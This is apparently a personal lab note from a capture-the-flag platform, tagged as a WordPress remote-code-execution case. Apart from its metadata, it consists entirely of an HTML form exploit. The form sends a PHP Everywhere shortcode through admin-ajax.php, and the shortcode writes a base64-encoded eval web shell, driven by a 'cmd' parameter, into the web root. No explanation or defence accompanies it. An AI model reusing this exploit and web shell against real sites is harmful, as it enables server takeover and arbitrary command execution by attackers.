UID: 20240605140351
created: 2024-06-05
tags:
- 春秋云镜
漏洞类型:
- RCE
漏洞出处:
- wordpress
dg-publish:
- "true"
<form
action="http://eci-2ze8cyytdtrkar5l6kyn.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea
>
<input type="submit" value="Execute" />
</form>
